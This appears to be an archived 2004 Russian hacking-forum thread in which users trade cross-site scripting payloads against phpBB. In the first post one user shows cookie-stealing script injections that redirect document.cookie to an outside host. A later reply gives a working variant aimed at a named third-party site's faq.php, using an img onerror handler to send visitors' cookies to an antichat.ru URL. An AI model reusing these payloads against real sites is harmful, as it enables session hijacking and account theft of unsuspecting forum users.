ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Эксперимент с xss, на форуме phpBB
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Эксперимент с xss, на форуме phpBB
  #1  
Старый 30.10.2004, 00:46
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию Эксперимент с xss, на форуме phpBB
Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
 

  #2  
Старый 30.10.2004, 01:14
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?
 

  #3  
Старый 30.10.2004, 18:07
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию
 

  #4  
Старый 31.10.2004, 00:34
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Вот так работает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cook ie>st&amp;faq[0][1]=test
[/QUOTE]<span id='postcolor'>
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Накрутка госований в форумах phpbb Koller Форумы 16 13.01.2006 17:36
phpBB <=2.0.18 "Login Dictionnary Attack" néM3S!s Forum for discussion of ANTICHAT 9 28.12.2005 17:27
Очередные дыры: phpBB 2.0.14 rsha1988 Форумы 8 08.05.2005 18:48
Эксперимент с Warn FixSlader Болталка 9 28.04.2005 11:22
Как узнать пароль на форуме phpBB <=2.0.10 ? Evgeny Форумы 6 26.11.2004 22:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ